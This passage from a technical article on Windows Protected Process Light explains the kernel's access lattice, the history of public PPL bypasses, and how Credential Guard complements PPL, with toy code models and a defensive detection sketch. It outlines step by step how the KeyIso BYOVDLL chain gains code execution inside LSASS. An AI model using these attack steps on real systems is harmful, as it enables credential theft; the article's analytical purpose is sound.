    App->>Nt: NtOpenProcess(DesiredAccess)
    Nt->>PsPO: dispatch
    PsPO->>Chk: protection check
    Chk->>Rtl: lookup caller / target rungs
    Rtl->>Tab: index row, retrieve allowed bits
    Tab-->>Rtl: row of allowed access bits
    Rtl-->>Chk: full mask allowed or stripped
    Chk-->>PsPO: residual mask (full or limited)
    PsPO->>SAC: residual mask vs DACL + token
    SAC-->>Nt: final mask
    Nt-->>App: handle or STATUS_ACCESS_DENIED

Key idea: The protection check runs before SeAccessCheck. Privileges are evaluated by SeAccessCheck. The reason SeDebugPrivilege does not help is structural -- it is not consulted at the moment of denial.

Four worked traces make this concrete.

Case (a): admin -> lsass with PROCESS_ALL_ACCESS. The caller has no EPROCESS.Protection.Type (it is None). The target is PPL/Lsa. The lattice forbids the full mask. The kernel strips every bit of PROCESS_ALL_ACCESS except the limited subset. The caller wanted to read memory; the limited subset cannot read memory; the operation effectively fails. This is the Mimikatz scenario.

Case (b): admin -> lsass with PROCESS_QUERY_LIMITED_INFORMATION. Same caller, same target, but the requested mask sits entirely in the limited subset. The lattice does not gate the limited mask. SeAccessCheck evaluates the DACL on lsass.exe, finds that administrators are permitted to query basic process information, and the call succeeds. This is why Process Explorer can still enumerate lsass.exe and show its threads even when LSA protection is enabled.

Case (c): MsMpEng.exe (PPL/Antimalware, rung 3) -> lsass.exe (PPL/Lsa, rung 4) with PROCESS_VM_READ. The lattice rule: caller rung 3 < target rung 4, so the full mask is denied. Defender cannot read LSASS memory. Defender does not need to; the cross-rung isolation prevents one Microsoft service from reading another Microsoft service's secrets even within the same trusted system.

Case (d): hypothetical PPL/WinTcb (rung 6) -> lsass.exe (PPL/Lsa, rung 4) with PROCESS_VM_READ. The lattice rule: caller rung 6 >= target rung 4, so the full mask is allowed. A process signed at the WinTcb rung can read LSASS memory by design. This is how Service Control Manager and Windows Error Reporting can still interact with protected lsass.exe.

Caller	Target	Mask	Lattice rule	Outcome
Admin, no Protection	PPL/Lsa	PROCESS_ALL_ACCESS	Caller has no rung	Full mask stripped (denied)
Admin, no Protection	PPL/Lsa	PROCESS_QUERY_LIMITED_INFORMATION	Limited mask	Allowed (DACL permitting)
PPL/Antimalware (3)	PPL/Lsa (4)	PROCESS_VM_READ	3 < 4	Denied
PPL/WinTcb (6)	PPL/Lsa (4)	PROCESS_VM_READ	6 >= 4	Allowed
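The four traces can be replayed in a toy model of the protection stage. The sketch below combines the numeric lattice rule with the deny masks quoted earlier and reports which requested bits the lattice gates and which bits would be handed on to `SeAccessCheck`. It models the description in this section, not the kernel's actual code path; DACL evaluation is out of scope, and every name is illustrative.

```javascript
const TYPE_NONE = 0, TYPE_PPL = 1, TYPE_PP = 2;
const ACCESS = {
  PROCESS_VM_READ: 0x0010,
  PROCESS_QUERY_LIMITED_INFORMATION: 0x1000,
  PROCESS_ALL_ACCESS: 0x1FFFFF,
};
// Target rungs with the wider deny mask: Antimalware (3), Lsa (4), WinTcb (6).
const TOP_TIER_SIGNERS = new Set([3, 4, 6]);

function dominates(caller, target) {
  if (caller.type === TYPE_NONE) return false;                       // no rung
  if (caller.type === TYPE_PPL && target.type === TYPE_PP) return false; // Rule 3
  return caller.signer >= target.signer;                             // Rules 1 and 2
}

// Stage 1 only: the lattice check that runs before any DACL or privilege check.
function protectionCheck(caller, target, desiredAccess) {
  if (target.type === TYPE_NONE || dominates(caller, target)) {
    return { gatedBits: 0, residual: desiredAccess };
  }
  const denyMask = TOP_TIER_SIGNERS.has(target.signer) ? 0xFC7FF : 0xFC7FE;
  return {
    gatedBits: desiredAccess & denyMask,  // full-mask bits the lattice refuses
    residual: desiredAccess & ~denyMask,  // limited bits left for SeAccessCheck
  };
}

const hex = (n) => '0x' + n.toString(16);
const lsassTarget = { type: TYPE_PPL, signer: 4 };
const adminCaller = { type: TYPE_NONE, signer: 0 };
const traces = [
  ['(a) admin, PROCESS_ALL_ACCESS', adminCaller, ACCESS.PROCESS_ALL_ACCESS],
  ['(b) admin, QUERY_LIMITED', adminCaller, ACCESS.PROCESS_QUERY_LIMITED_INFORMATION],
  ['(c) PPL/Antimalware, VM_READ', { type: TYPE_PPL, signer: 3 }, ACCESS.PROCESS_VM_READ],
  ['(d) PPL/WinTcb, VM_READ', { type: TYPE_PPL, signer: 6 }, ACCESS.PROCESS_VM_READ],
];
for (const [label, caller, mask] of traces) {
  const r = protectionCheck(caller, lsassTarget, mask);
  console.log(label, '| gated:', hex(r.gatedBits), '| to SeAccessCheck:', hex(r.residual));
}
```

Nothing in `protectionCheck` looks at a token or a privilege, which is the structural point: SeDebugPrivilege has no input into this stage.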

The Audit bit revisits the table from a different angle. The bit is annotated Reserved in itm4n's public structure definition and named without semantic gloss in Ionescu Part 1; the precise runtime emission shape on an OpenProcess denial is not enumerated in any of Ionescu Part 1, Forshaw 2018, itm4n's RunAsPPL writeup, or Microsoft Learn's RunAsPPL page (whose CodeIntegrity events 3033/3063/3065/3066 are scoped to AuditLevel under IFEO\LSASS.exe and to DLL-load failures, not per-process Audit-bit denials) [@ionescu-part1] [@itm4n-runasppl] [@learn-runasppl]. The field name and bit position imply a forensic side-channel; the exact event shape is not in the public record.

Two adjacent kernel mechanisms exist in the same neighbourhood but mediate different threat models. PROCESS_TRUST_LABEL_ACE (a Trust SID ACL entry, introduced in Windows 8.1 alongside PPL) is an ACL-side companion that runs inside SeAccessCheck -- it adds a token-style trust label that interacts with the security descriptor in the standard way. Code Integrity Guard (ProcessSignaturePolicy) is a per-process signed-image enforcer settable at CreateProcess time via the PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY attribute. Neither is part of PPL; both interact with the same problem space.

The kernel verifies who is asking, what they are asking for, and at what rung the target sits. What the kernel cannot verify is the behaviour of code that arrives through a signed channel and then executes against attacker-controlled data. That structural seam is the entire premise of the bypass arms race, and it is the next section.

8. The Bypass Arms Race -- Forshaw, itm4n, Landau

If the kernel only verifies the channel by which code enters a PPL, every bypass should attack the seam between channel and behaviour. Test that prediction against the public record. Since 2018, four named bypass acts have hit major Microsoft research blogs. All four sit in the same structural class.

Key idea: The kernel verifies the channel. It does not verify the behaviour. Every public PPL bypass since 2018 attacks the seam between what the channel proves (a signature, an EKU, a section identity) and what the code does once mapped.

Act I (2018) -- Forshaw and JScript-into-PPL

James Forshaw, then at Google Project Zero, published "Injecting Code into Windows Protected Processes Using COM" in October 2018 [@forshaw-2018-10]. The mechanism: a PPL can be made to instantiate a COM object whose CLSID resolves to scrobj.dll, the Microsoft-signed Windows Script Component scripting host. Once loaded into the PPL, the script object accepts attacker-supplied source code and executes it inside the protected process. The DLL is signed. The kernel admits it. The kernel cannot reason about the JScript source it then runs.

Microsoft's fix in Windows 10 1803 (April 2018, deployed broadly through that year) was a hardcoded deny-list in CI.DLL. Forshaw's own writeup gives the source verbatim [@forshaw-2018-10]:

UNICODE_STRING g_BlockedDllsForPPL[] = {
    DECLARE_USTR("scrobj.dll"),
    DECLARE_USTR("scrrun.dll"),
    DECLARE_USTR("jscript.dll"),
    DECLARE_USTR("jscript9.dll"),
    DECLARE_USTR("vbscript.dll")
};

NTSTATUS CipMitigatePPLBypassThroughInterpreters(
    PEPROCESS Process, LPBYTE Image, SIZE_T ImageSize)
{
    if (!PsIsProtectedProcess(Process)) return STATUS_SUCCESS;
    // walk g_BlockedDllsForPPL; if any match, return STATUS_DYNAMIC_CODE_BLOCKED
    ...
}

Five DLLs, hardcoded. Microsoft Learn corroborates the policy on the user-facing side [@learn-am-services]:

The following scripting DLLs are forbidden by CodeIntegrity inside a protected process: scrobj.dll, scrrun.dll, jscript.dll, jscript9.dll, and vbscript.dll.
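The quoted kernel routine elides its matching loop, so the sketch below is only a guess at the shape of a name-based deny-list: it compares the file's base name, case-insensitively, against the five listed DLLs. The base-name and case-folding behaviour are assumptions made for illustration, not a description of what CI.DLL does.

```javascript
// The five names from the quoted deny-list.
const BLOCKED_DLLS_FOR_PPL = [
  'scrobj.dll', 'scrrun.dll', 'jscript.dll', 'jscript9.dll', 'vbscript.dll',
];

// Assumed matching rule: base name only, case-insensitive.
function isBlockedForPpl(imagePath) {
  const baseName = imagePath.split(/[\\/]/).pop().toLowerCase();
  return BLOCKED_DLLS_FOR_PPL.includes(baseName);
}

console.log(isBlockedForPpl('C:\\Windows\\System32\\SCROBJ.DLL'));   // true
console.log(isBlockedForPpl('C:\\Windows\\System32\\kernel32.dll')); // false
```

A list like this blocks five known interpreters and nothing else. Any other signed binary that runs attacker-supplied input passes straight through it.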

Channel: a Microsoft-signed DLL. Behaviour: arbitrary attacker script. The fix narrows the channel by name-listing the five DLLs known to admit attacker behaviour. The class survives.

The mechanism was previewed at Recon Montreal 2018 in the joint Forshaw-Ionescu talk "Unknown Known DLLs and other Code Integrity Trust Violations" (June 15-17, 2018) [@recon-mtl-2018]. Forshaw's August 2017 "Bypassing VirtualBox Process Hardening" essay [@forshaw-2017-vbox] is the structural precursor -- it makes the same channel-vs-behaviour argument against a different kernel-supported process-hardening regime.

Act II (2018-2021) -- DefineDosDevice and PPLdump

In his August 2018 post on object-directory exploits [@forshaw-2018-08], Forshaw added a single throwaway sentence that the security community would spend three years productising. itm4n quotes it verbatim in his 2021 SCRT walkthrough [@itm4n-scrt]:

Abusing the DefineDosDevice API actually has a second use, it's an Administrator to Protected Process Light (PPL) bypass.

The mechanism, fully worked out by itm4n in April 2021, is structural and uses that same primitive. As an administrator, call DefineDosDevice to create a symbolic link in \KnownDlls\ (the object-manager directory that the loader uses for fast known-DLL lookups). The call is dispatched via RPC to csrss.exe, which runs at PPL/WinTcb (rung 6) and so has the lattice authority to write into protected directories. The administrator gets a \KnownDlls\ entry pointing at an attacker-controlled section. Now start a PPL. The PPL's loader resolves DLL names through \KnownDlls\ and finds the administrator's entry. The PPL maps the attacker's section without re-validating its on-disk signature, because \KnownDlls\ is the kernel's vouched-for fast path.

itm4n's PPLdump tool, published April 2021, automated the attack. The README test matrix lists every Windows version it ran against [@ppldump-repo]. For fifteen months, an administrator could dump any PPL's memory, including lsass.exe, despite RunAsPPL.

Microsoft's fix arrived in build 19044.1826 (the July 2022 update to Windows 10 21H2). itm4n's "End of PPLdump" writeup describes the patch and the BinDiff diff verbatim [@itm4n-end-of-ppldump]:

The conclusion is that PPLs now appear to be behaving just like PPs and therefore no longer rely on Known DLLs.

The fix patched LdrpInitializeProcess in NTDLL to skip \KnownDlls\ for PPL processes, behind a Velocity feature flag (Feature_Servicing_2206c_38427506__private_IsEnabled). PPLdump's repository README now opens with [@ppldump-repo]:

2022-07-24 - As of Windows 10 21H2 10.0.19044.1826 (July 2022 update), the exploit implemented in PPLdump no longer works. A patch in NTDLL now prevents PPLs from loading Known DLLs.

itm4n's structural finding -- that *PPLs honoured \KnownDlls\ while PPs did not* -- is the most interesting failure in the eight-year run, because the asymmetry sat in plain sight from 2013 to 2022 and nobody had asked "why are PPs and PPLs loading sections differently?" The fix closes one asymmetry. The structural class survives.

PPLdump's substitution chain uses NTFS transactions and Forrest Orr's "phantom DLL hollowing" technique to materialise the attacker-controlled section on disk in a way the kernel section creator will accept [@forrest-orr-hollow]. Orr's writeup is the original publication of the hollowing primitive; PPLdump composes it with the \KnownDlls\ redirection trick.

Act III (2022-2024) -- Landau's PPLFault CI TOCTOU

Gabriel Landau, then at Elastic, presented "PPLdump Is Dead. Long Live PPLdump!" at Black Hat Asia 2023 [@bh-asia-2023-pdf]. The mechanism is a Time-Of-Check / Time-Of-Use bug at the section-creation layer.

Time-Of-Check / Time-Of-Use (TOCTOU): A class of bug in which a security property is verified at one point in time but the underlying object is mutable between the check and the use. The protected resource passes its check, then changes between check and access, and the operation proceeds against the changed state without re-verification.

The TOCTOU here is subtle. When a PPL calls NtCreateSection on a Microsoft-signed DLL, the kernel's memory manager calls MiValidateSectionCreate, which calls into ci.dll to verify the file's Authenticode signature. The check succeeds. The section is created. But the memory manager does not page in the file contents at section-create time; it pages them in lazily, on demand, when threads first touch the mapped pages. If an attacker can keep the section's backing file unsubstituted during the signature check and substituted during the lazy page-in, the kernel will execute attacker bytes through a section whose signature it already verified.
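The check-then-lazy-use shape can be reduced to a toy model. The sketch below is not Windows code: `fnv1a` is a stand-in for the real Authenticode hash, and `makeBackingFile` and `createSection` are hypothetical names invented for illustration. It only shows why verifying the whole file once, and reading it later, leaves a window.

```javascript
// Toy model of a check-at-create, read-at-fault section. Not Windows code.
// fnv1a stands in for the real signature hash; all names are hypothetical.
function fnv1a(text) {
  let h = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    h ^= text.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

// A "file" whose contents an attacker can swap after the check.
function makeBackingFile(initialBytes) {
  return { bytes: initialBytes };
}

// Time of check: verify the whole file once, then hand back a lazy section.
function createSection(file, trustedHash) {
  if (fnv1a(file.bytes) !== trustedHash) {
    throw new Error("signature check failed");
  }
  // Time of use: contents are read only when a page is first touched.
  return { touch: () => file.bytes };
}

const signedBytes = "MICROSOFT-SIGNED-CODE";
const backingFile = makeBackingFile(signedBytes);
const section = createSection(backingFile, fnv1a(signedBytes)); // check passes

backingFile.bytes = "ATTACKER-PAYLOAD"; // swap between check and use
const executed = section.touch();       // lazy page-in sees the swapped bytes

console.log(executed); // prints "ATTACKER-PAYLOAD"
```

The check was honest and the section object never changed; only the bytes behind it did.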

Landau's exploit uses Windows' CloudFilter API. An attacker holds an exclusive oplock on a Microsoft-signed DLL during the section-create signature check. After the check passes, the attacker's CloudFilter FetchDataCallback provides different bytes (the payload) when the kernel pages in the section. The PPL maps and executes the payload. Landau's Elastic post documents the chain verbatim [@elastic-pplfault]:

The internal memory manager function MiValidateSectionCreate relies on the Code Integrity module ci.dll to handle the requisite cryptography and PKI policy.

Microsoft's fix shipped in Windows Insider Canary build 25941 on September 1, 2023 [@elastic-pplfault]:

On September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941 ... Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.

The fix narrows the immediate channel by extending page-hash validation to PPL-loaded images that reside on remote (SMB redirector) paths -- the precise surface that PPLFault required to drive its CloudFilter FetchDataCallback substitution [@elastic-pplfault]. Locally-cached PPL DLL loads continue to rely on the section-create signature check, so the structural seam survives. The GA patch shipped on February 13, 2024 [@pplfault-repo]:

2024-02 UPDATE: Microsoft patched PPLFault on 2024-02-13.

Channel: a signed Microsoft DLL whose hash matched at section create. Behaviour: attacker payload mapped via the lazy page-in. The fix narrows the channel by widening the verification surface from "the file at section-create time" to "every page at fault time." The class survives.
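A minimal sketch of what "every page at fault time" means, again as a toy model rather than Windows code. `PAGE_SIZE`, `fnv1a`, and `createHashedSection` are hypothetical, and the page hashes are computed at create time purely for simplicity; the assumption is that the real mechanism takes them from the signed image.

```javascript
// Toy model of per-page validation at fault time. Not Windows code.
const PAGE_SIZE = 4; // tiny pages keep the example readable

function fnv1a(text) {
  let h = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    h ^= text.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

function splitPages(bytes) {
  const pages = [];
  for (let i = 0; i < bytes.length; i += PAGE_SIZE) {
    pages.push(bytes.slice(i, i + PAGE_SIZE));
  }
  return pages;
}

// At create time, record one hash per page of the verified image.
function createHashedSection(file) {
  const pageHashes = splitPages(file.bytes).map(fnv1a);
  return {
    // At fault time, re-hash the page that is actually being paged in.
    touch(pageIndex) {
      const page = splitPages(file.bytes)[pageIndex];
      if (page === undefined || fnv1a(page) !== pageHashes[pageIndex]) {
        throw new Error("page hash mismatch on page " + pageIndex);
      }
      return page;
    },
  };
}

const hashedFile = { bytes: "GOODGOODGOOD" };
const hashedSection = createHashedSection(hashedFile);
const firstPage = hashedSection.touch(0);

hashedFile.bytes = "GOODEVILGOOD"; // attacker swaps only the second page
let swapBlocked = false;
try {
  hashedSection.touch(1);
} catch (err) {
  swapBlocked = true;
}

console.log(firstPage, swapBlocked); // prints "GOOD true"
```

The swap still happens; it simply no longer survives the fault path for any page whose hash is checked.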

Act IV (2022-2024) -- BYOVDLL and itm4n's KeyIso chain

BYOVDLL stands for Bring Your Own Vulnerable DLL. The term was coined by Gabriel Landau on Twitter in October 2022 (itm4n screenshots the original tweet [@itm4n-ghost-part1]; tweet status 1580067594568364032) and productised by itm4n in August 2024 in "Ghost in the PPL Part 1."

BYOVDLL: A bypass class against any signature-gated security mechanism in which the attacker loads a *legitimately signed but historically vulnerable* binary and exploits the known vulnerability inside it. The signature check passes; the vulnerability does the work. The structural property that makes the class hard to fix is that the kernel cannot deny-list legitimately signed older Microsoft DLLs without breaking the deployments that still depend on them.

itm4n's specific chain targets the CNG Key Isolation service ("KeyIso"), which runs in lsass.exe and so inherits its PPL/Lsa protection. The chain is precise [@itm4n-ghost-part1]:

1. As administrator, stop the KeyIso service.
2. Set HKLM\SYSTEM\CurrentControlSet\Services\KeyIso\Parameters\ServiceDll to point at an older keyiso.dll extracted from Microsoft update KB5023778. This DLL is Microsoft-signed; the kernel admits it.
3. Restart the KeyIso service. The older keyiso.dll loads into LSASS at PPL/Lsa.
4. Trigger CVE-2023-36906, an out-of-bounds read information disclosure in the older keyiso.dll, to leak an address.
5. Trigger CVE-2023-28229, one of six use-after-frees in the same DLL, to obtain control of a CALL target via the RAX register.
6. Execute attacker code at PPL/Lsa.
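The chain's second step leaves a durable artefact: a ServiceDll value that no longer points at the in-box DLL. A defender-side sketch of that comparison follows. The expected path in `EXPECTED_KEYISO_DLL` is an assumption to confirm against a known-good host, the function names are hypothetical, and reading the registry is deliberately left out.

```javascript
// Defensive sketch: flag a KeyIso ServiceDll value that has been repointed.
// EXPECTED_KEYISO_DLL is an assumption; confirm it on a known-good host.
const EXPECTED_KEYISO_DLL = "%systemroot%\\system32\\keyiso.dll";

// Case-fold and normalise separators so equivalent paths compare equal.
function normalisePath(p) {
  return p.trim().toLowerCase().replace(/\//g, "\\");
}

// Returns true when the observed value differs from the expected in-box path.
function isServiceDllRepointed(serviceDllValue, systemRoot = "C:\\Windows") {
  const root = normalisePath(systemRoot);
  const expected = normalisePath(EXPECTED_KEYISO_DLL).replace("%systemroot%", root);
  const actual = normalisePath(serviceDllValue).replace("%systemroot%", root);
  return actual !== expected;
}

console.log(isServiceDllRepointed("%SystemRoot%\\system32\\keyiso.dll")); // false
console.log(isServiceDllRepointed("C:\\Temp\\old\\keyiso.dll"));          // true
```

A path comparison does not catch an older DLL copied over the expected location, so file version or hash checks would be a natural companion.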

The CVEs are real and tracked. k0shl's writeup is the primary root-cause analysis [@k0shl-keyiso]:

Microsoft patched vulnerabilities I reported in CNG Key Isolation service, assigned CVE-2023-28229 and CVE-2023-36906, the CVE-2023-28229 included 6 use after free vulenrabilities with similar root cause and the CVE-2023-36906 is a out of bound read information disclosure.

NVD records both [@nvd-2023-28229] [@nvd-2023-36906]. Y3A's GitHub repository [@y3a-cve-poc] provides a public PoC for CVE-2023-28229 that itm4n's chain composes.

Channel: an actually-Microsoft-signed DLL. Behaviour: the memory-safety vulnerability inside it. There is no general fix announced. Microsoft fixed the specific CVEs by shipping a newer keyiso.dll, but the older DLL remains in circulation (it ships inside every patched cumulative update bundle), and a kernel that has to admit every legitimately signed older Microsoft DLL has no general defense against the next CVE-of-the-month.

Note: BYOVDLL has no general patch. Microsoft fixes each underlying CVE on the standard cumulative-update cadence. The class persists for as long as the kernel admits older signed Microsoft DLLs into PPLs, which is for as long as legitimately deployed software depends on the older DLLs.

Figure: timeline, "PPL Bypass Arms Race (2018-2024)". 2018-10: Forshaw JScript-into-PPL (fixed in 1803, April 2018, by the g_BlockedDllsForPPL deny-list). 2021-04: itm4n PPLdump via KnownDlls (fixed July 2022 in build 19044.1826 by the LdrpInitializeProcess patch). 2022-09: Landau PPLFault TOCTOU (fixed at GA on February 13, 2024, by CI page hashes for PPLs). 2024-08: itm4n BYOVDLL KeyIso chain (no general fix; CVEs patched piecewise).

Act	Year	Channel verified	Behaviour exploited	Microsoft fix	Fix date
I	2018	Microsoft-signed `scrobj.dll`	JScript source executed by COM object	`g_BlockedDllsForPPL` deny-list of 5 DLLs	Apr 2018 (1803)
II	2021	`\KnownDlls\` symlink (CSRSS-blessed)	Attacker section mapped without re-validation	NTDLL `LdrpInitializeProcess` patch	Jul 2022 (19044.1826)
III	2023	Signed DLL passed `MiValidateSectionCreate`	CloudFilter substitutes bytes on lazy page-in	`/INTEGRITYCHECK` page hashes for PPLs	Feb 2024 (GA)
IV	2024	Legitimately-signed older `keyiso.dll`	Use-after-free + OOB read (CVE-2023-28229, CVE-2023-36906)	None (CVE-by-CVE)	open

Figure: flowchart of the KeyIso chain. Admin stops the KeyIso service -> repoints ServiceDll to the older keyiso.dll from KB5023778 -> restarts the KeyIso service -> the older keyiso.dll loads into lsass.exe at PPL/Lsa -> CVE-2023-36906 OOB read for the info leak -> CVE-2023-28229 UAF for RAX control -> code execution at PPL/Lsa.

itm4n explicitly attributes the BYOVDLL framing to Landau's October 2022 tweet, even though itm4n's KeyIso chain is the first public productisation. The attribution chain matters because it documents how a one-line research observation (Twitter status 1580067594568364032, screenshot preserved in [@itm4n-ghost-part1]) became a working exploit two years later. The pattern repeats in this domain: Forshaw's one-sentence DefineDosDevice comment to PPLdump (3 years); Landau's BYOVDLL tweet to itm4n's KeyIso chain (2 years). The structural class outlives its discoverer.

Four acts, one class. Every public bypass since 2018 has lived in the same narrow shape: code that becomes part of a PPL through a signed channel and executes attacker-influenced data once mapped. Each generation of fix narrows what the channel admits -- name-list five DLLs; ignore \KnownDlls\; page-hash every section; CVE-patch every vulnerable older DLL. The class survives because the kernel cannot reason about behaviour. By Rice's theorem it cannot reason about behaviour in general; in practice, it has nowhere even to start.

If lsass.exe code execution is reachable through BYOVDLL, where are the actual secrets? Not in lsass.exe. Not anywhere the kernel can read at all. The next section is the companion boundary.

9. The Companion Boundary -- Credential Guard, VBS, and `LsaIso.exe`

itm4n opens his RunAsPPL walkthrough with a warning [@itm4n-runasppl]:

I noticed that this protection tends to be confused with Credential Guard, which is completely different.

The confusion is understandable. Both run on Windows. Both protect LSASS. Both are configured by domain administrators. Both yield "ACCESS_DENIED" to Mimikatz when working correctly. They are nonetheless answering different questions, and they stack rather than replace each other.

PPL stops an administrator from reading kernel-trusted user-mode memory. It does nothing against a kernel-mode attacker who can simply zero the Protection byte in the target EPROCESS. The kernel-mode attacker is the next threat-model rung up, and the kernel-mode attacker is the threat that Credential Guard answers, by moving the credentials themselves out of lsass.exe entirely.

Virtualization-based security (VBS): A Hyper-V-based isolation regime in which the Windows hypervisor partitions the system into Virtual Trust Levels (VTLs). VTL0 contains the normal Windows kernel and user-mode processes. VTL1 contains the Secure Kernel and a small set of user-mode trustlets. Memory in VTL1 is inaccessible to VTL0, even from VTL0 kernel-mode code.

Trustlet: A user-mode process running inside VTL1. Trustlets are Microsoft-signed at a specific protected-process equivalent rung within VTL1 and serve as the user-mode hosts for VBS-isolated functionality. `LsaIso.exe` is the trustlet that holds the actual credential material on Credential Guard-enabled hosts.

The architecture is, at the highest level, three layers: VTL0 user-mode, VTL0 kernel, and VTL1 (Secure Kernel plus trustlets). On a Credential Guard-enabled host, lsass.exe still exists in VTL0 user-mode, still protects itself with PPL/Lsa, and still answers authentication requests. But it no longer holds the NTLM hashes, Kerberos TGT keys, or Cred Manager domain credentials. Those secrets live in LsaIso.exe, a trustlet in VTL1. When LSASS needs to authenticate a credential, it makes a hypercall into VTL1, and LsaIso.exe performs the cryptographic operation entirely within VTL1 memory, returning only the result. The keys never leave VTL1.
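The "return only the result" contract is easier to see in miniature. The sketch below is a loose analogy, not the LSASS-to-LsaIso interface: `createIsolatedKeyHolder` is a hypothetical name, and a JavaScript closure is a language-level boundary, whereas the VTL boundary is enforced by the hypervisor. It uses Node's built-in `crypto` module.

```javascript
const crypto = require("crypto");

// Loose analogy only: the key lives in a closure and is never returned.
// The real boundary is enforced by the hypervisor, not by language scoping.
function createIsolatedKeyHolder() {
  const secretKey = crypto.randomBytes(32); // stays inside this scope

  // Performs the keyed operation and hands back only the result.
  function sign(message) {
    return crypto.createHmac("sha256", secretKey).update(message).digest("hex");
  }

  // Checks a tag without ever exposing the key to the caller.
  function verify(message, tagHex) {
    const expected = Buffer.from(sign(message), "hex");
    const given = Buffer.from(tagHex, "hex");
    return given.length === expected.length &&
      crypto.timingSafeEqual(given, expected);
  }

  return Object.freeze({ sign, verify });
}

const isolated = createIsolatedKeyHolder();
const authTag = isolated.sign("authenticate: alice");

console.log(isolated.verify("authenticate: alice", authTag)); // true
console.log(Object.keys(isolated)); // [ 'sign', 'verify' ]
```

Code that fully compromises the caller can still ask for operations to be performed; what it cannot do is walk away with the key.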

Microsoft's documentation states the threat model directly [@learn-cg]:

Credential Guard prevents credential theft attacks by protecting NTLM password hashes, Kerberos Ticket Granting Tickets (TGTs), and credentials stored by applications as domain credentials.

Credential Guard uses Virtualization-based security (VBS) to isolate secrets so that only privileged system software can access them.

Malware running in the operating system with administrative privileges can't extract secrets that are protected by VBS.

The third sentence is the load-bearing one. Malware running with administrative privileges maps cleanly to a PPL bypass that achieves code execution at PPL/Lsa. Even from inside lsass.exe, the secrets are not there.

Figure: flowchart of the two barriers. VTL0 (normal world) contains the Admin / SYSTEM token, lsass.exe at PPL/Lsa, and the VTL0 kernel. VTL1 (secure world) contains the Secure Kernel and the LsaIso.exe trustlet, which holds the NTLM hashes and Kerberos TGT keys. The PPL barrier (lattice) blocks Admin from lsass.exe; lsass.exe reaches LsaIso.exe by hypercall; the VBS barrier (VTL boundary) blocks the VTL0 kernel from LsaIso.exe.

The two mechanisms stack rather than overlap. PPL prevents an admin from OpenProcess(PROCESS_VM_READ, lsass) at the user-mode lattice level. Credential Guard prevents a kernel-mode attacker who succeeds against PPL from finding the keys, because the keys are in VTL1 memory that the VTL0 kernel cannot read at all. itm4n's "complementary" framing in the RunAsPPL writeup is the right operational summary [@itm4n-runasppl]: deploy both, always both.

Note: PPL gates user-mode admins out of LSASS code memory. Credential Guard gates everything else (kernel-mode attackers, BYOVDLL execution-at-PPL/Lsa) out of the secrets themselves by moving the secrets to VTL1. Each mechanism answers a layer of the threat model the other does not.

Dimension	PPL (LSA protection)	Credential Guard
Threat model	Administrator -> user-mode LSASS	VTL0 kernel + admin -> credential material
Layer	VTL0 user-mode lattice	VTL0 / VTL1 VBS boundary
Kernel-mode attacker	Cannot stop them	Stops them (VBS-isolated memory)
MSRC classification	Defense in depth	Security boundary
Default-on (consumer)	Audit mode, Win11 22H2	n/a (enterprise)
Default-on (enterprise)	Audit mode, Win11 22H2	Enabled, Win11 22H2 / Win Server 2025 (domain-joined non-DC)

The architecture of `LsaIso.exe`, its trustlet ID, its IUM EKU, and the hypercall plumbing between LSASS and the trustlet are the subject of a separate article in this series ("VBS Trustlets: What Actually Runs in the Secure Kernel"). The cross-link is deliberate: PPL and Credential Guard are paired in practice, but the architectural depth of VTL1 is its own subject.

Credential Guard's default-on rollout, recorded in Microsoft Learn [@learn-cg]:

Starting in Windows 11, 22H2 and Windows Server 2025, Credential Guard is enabled by default on domain-joined, non-DC systems that meet hardware requirements.

Two stacked mechanisms; one classified as a security boundary, one not. The next section asks what the classification means.

10. Where PPL Isn't a Security Boundary -- Microsoft's Servicing Criteria

Gabriel Landau's "Inside Microsoft's Plan to Kill PPLFault" essay states the classification in one sentence [@elastic-pplfault]:

Microsoft does not consider PPL to be a security boundary, meaning they won't prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically addressed some such vulnerabilities on a less-urgent basis.

Microsoft's "Windows Security Servicing Criteria" defines the term security boundary directly [@msrc-servicing]:

A security boundary provides a logical separation between the code and data of security domains with different levels of trust. For example, the separation between kernel mode and user mode is a classic [...] security boundary.

Security boundary: A logical separation between code and data of security domains with different levels of trust. Microsoft commits to servicing security boundary violations with out-of-band patches when the severity bar is met. The kernel-mode / user-mode separation is the canonical example. Per Microsoft's published servicing criteria, PPL is *not* on the security-boundary list.

Defense in depth: A security feature that raises the cost of an attack without guaranteeing prevention. Microsoft treats defense-in-depth features as servicing targets on the standard cumulative-update cadence, not as out-of-band patch priorities. PPL falls into this category per Microsoft's published classification.

The relevant excerpts of the criteria page enumerate which surfaces are and are not boundaries. The live MSRC page renders that enumeration table client-side via JavaScript; the raw HTML returned by automated fetchers contains only the React shell. The text of the enumeration is preserved in the Wayback Machine capture at archive date 2023-05-06 [@msrc-criteria-archive], and Landau's follow-on Elastic post quotes the relevant administrative-process row verbatim [@elastic-byovd-admin]:

Administrative processes and users are considered part of the Trusted Computing Base (TCB) for Windows and are therefore not strong[ly] isolated from the kernel boundary.

The corresponding row for PPL is the same shape: administrative-process-to-PPL is not isolated as a security boundary. Landau filed VULN-074311 with MSRC in September 2022 disclosing both an admin-to-PPL and a PPL-to-kernel zero-day. The Elastic post records MSRC's classification of the disclosure verbatim [@elastic-byovd-admin]:

MSRC similarly does not consider admin-to-PPL a security boundary, instead classifying it as a defense-in-depth security feature.

The MSRC servicing-criteria page's *definition* of "security boundary" is retrievable from raw HTML and verified against the live page. The *enumeration* of which Windows surfaces are or are not boundaries lives in a client-side rendered table and is not present in the raw HTML payload. The verifiable trail for "PPL is excluded from the boundary list" is the Wayback Machine capture combined with Elastic's verbatim quotation of MSRC's classification.

The operational consequence is direct. A published PPL bypass does not trigger an out-of-band patch. It is fixed on the next major-release cadence, sometimes faster if Microsoft has internal motivation. The disclosure-to-fix half-lives are public record:

Bypass	Disclosed	Microsoft fix	Disclosure-to-fix
Forshaw 2018 JScript-into-PPL	Oct 2018	Apr 2018 (1803, pre-disclosure)	~0 months (Microsoft fixed first)
